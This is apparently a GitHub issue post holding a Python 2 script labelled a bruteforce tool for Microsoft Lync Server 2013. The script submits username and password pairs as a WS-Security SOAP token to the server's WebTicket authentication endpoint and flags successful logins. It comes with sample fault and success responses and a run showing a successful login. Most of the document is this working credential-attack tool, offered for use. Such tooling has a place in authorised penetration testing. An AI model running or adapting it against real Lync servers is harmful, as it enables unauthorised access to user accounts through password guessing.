[bruteforce] Microsoft lync server 2013 #16

Open
nixawk opened this issue Aug 8, 2017 · 0 comments

nixawk commented Aug 8, 2017

#!/usr/bin/python
# -*- coding: utf-8 -*-

# Purpose: Bruteforce Lync User.
# Product: Microsoft Lync Server 2013
# Author : Nixawk

import requests
import base64
import logging


# Module-level logger used for every per-attempt message; basicConfig()
# configures the root logger at INFO level so those messages are emitted.
log = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)


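def lync_login(indexURI, username, password):
    """Submit one username/password pair to the Lync WebTicket service.

    A WS-Trust ``RequestSecurityToken`` envelope carrying a WS-Security
    ``UsernameToken`` is POSTed to
    ``<indexURI>/WebTicket/WebTicketService.svc/Auth``.

    Args:
        indexURI: Base URL of the Lync web service
            (e.g. ``https://lyncpool.example.com``).
        username: Account name to submit.
        password: Password to submit.

    Returns:
        True when the server answers HTTP 200 and the response body contains
        ``<RequestedSecurityToken>``; False otherwise, including when the
        request raises.
    """
    sapi = "%s/WebTicket/WebTicketService.svc/Auth" % indexURI

    # NOTE: b64encode() is handed the arguments as-is, which only works where
    # str is a byte string (Python 2); under Python 3 it raises TypeError.
    #
    # The Context GUID and the Lifetime timestamps below are fixed literals, so
    # every request sent by this function carries the same values, which makes
    # the traffic easy to match in server-side request logs.
    envelope = [
        '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">',
        '<s:Header>',
        '<Security s:mustUnderstand="1" xmlns:u="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">',
        '<UsernameToken>',
        '<Username>%s</Username>' % base64.b64encode(username),
        '<Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordText">%s</Password>' % base64.b64encode(password),
        '</UsernameToken>',
        '</Security>',
        '</s:Header>',
        '<s:Body>',
        '<RequestSecurityToken xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" Context="50f2ef42-a03a-fa41-fe45-b032979f3642" xmlns="http://docs.oasis-open.org/ws-sx/ws-trust/200512">',
        '<TokenType>urn:component:Microsoft.Rtc.WebAuthentication.2010:user-cwt-1</TokenType>',
        '<RequestType>http://schemas.xmlsoap.org/ws/2005/02/trust/Issue</RequestType><AppliesTo xmlns="http://schemas.xmlsoap.org/ws/2004/09/policy">',
        '<EndpointReference xmlns="http://www.w3.org/2005/08/addressing">',
        '<Address>%s/WebTicket/WebTicketService.svc/Auth</Address>' % indexURI,
        '</EndpointReference>',
        '</AppliesTo>',
        '<Lifetime>',
        '<Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">2017-07-31T08:00:28Z</Created>',
        '<Expires xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">2017-07-31T08:31:28Z</Expires>',
        '</Lifetime>',
        '<KeyType>http://docs.oasis-open.org/ws-sx/ws-trust/200512/SymmetricKey</KeyType>',
        '</RequestSecurityToken>',
        '</s:Body>',
        '</s:Envelope>',
    ]
    data = ''.join(envelope)

    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Content-Type": "text/xml",
        "SOAPAction": "http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/Issue",
        "Referer": "%s/Dialin/Conference.aspx" % indexURI,
    }

    boolret = False
    try:
        # The context manager releases the session's pooled connection, and the
        # timeout keeps an unresponsive server from blocking the call forever.
        with requests.Session() as sess:
            response = sess.post(sapi, headers=headers, data=data, timeout=30)

        # NOTE(review): both messages below write the submitted password to the
        # log in clear text; treat the log output as sensitive.
        if response.status_code == 200 and "<RequestedSecurityToken>" in response.text:
            log.info("%s/%s - login successfully !", username, password)
            boolret = True

        log.info("%s/%s - login status: %s", username, password, response.status_code)
    except Exception as err:
        # Best-effort by design: any failure is logged with its traceback and
        # reported to the caller as False.
        log.exception(str(err))

    return boolret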


# Error Response:
# <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">a:InvalidSecurityToken</faultcode><faultstring xml:lang="zh-CN">No valid security token.</faultstring><detail><OCSDiagnosticsFault xmlns="urn:component:Microsoft.Rtc.WebAuthentication.2010" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><Ms-Diagnostics-Fault><ErrorId>28020</ErrorId><Reason>No valid security token.</Reason></Ms-Diagnostics-Fault><NameValuePairs xmlns:a="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/></OCSDiagnosticsFault></detail></s:Fault></s:Body></s:Envelope>

# Success Response:
# <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><RequestSecurityTokenResponseCollection xmlns="http://docs.oasis-open.org/ws-sx/ws-trust/200512" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><RequestSecurityTokenResponse Context="50f2ef42-a03a-fa41-fe45-b032979f3642"><TokenType>urn:component:Microsoft.Rtc.WebAuthentication.2010:user-cwt-1</TokenType><RequestedSecurityToken><UserToken xmlns="urn:component:Microsoft.Rtc.WebAuthentication.2010">cwt=AAEBHAEFAAAAAAAFFQAAADZZRLr9wt7biZjFdLjiAACBED....eA5TnN-9Gz7aSPI</UserToken></RequestedSecurityToken><AppliesTo xmlns="http://schemas.xmlsoap.org/ws/2004/09/policy"><EndpointReference xmlns="http://www.w3.org/2005/08/addressing"><Address>https://lyncpool.example.com/</Address></EndpointReference></AppliesTo><Lifetime><Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">2017-07-31T09:04:22.5149452Z</Created><Expires xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">2017-07-31T09:22:28.5149452Z</Expires></Lifetime><KeySize>0</KeySize></RequestSecurityTokenResponse></RequestSecurityTokenResponseCollection></s:Body></s:Envelope>

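if __name__ == '__main__':
    import sys

    # Exactly three arguments are required: base URI, username, password.
    if len(sys.argv) != 4:
        print("[*] python %s <lync URI> <[email protected]> <password>" % sys.argv[0])
        # A usage error is a failure, so report a non-zero exit status.
        sys.exit(2)

    # NOTE(review): the password is taken from the command line, so it is
    # visible in the process list and shell history of the host running this.
    # indexURI = "https://lyncpool.example.com"
    indexURI, username, password = sys.argv[1:4]

    lync_login(indexURI, username, password)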


## References
# https://msdn.microsoft.com/en-us/skype/ucwa/ucwaresources
# https://ucwa.skype.com/documentation/keytasks-createapplication
# https://msdn.microsoft.com/en-us/skype/ucwa/authenticationinucwa
$  python2.7 bruteforce_lync_server2013.py https://lyncpool.example.com "[email protected]/" "password"
INFO:__main__:[email protected]/password - login successfully !
INFO:__main__:[email protected]/password - login status: 200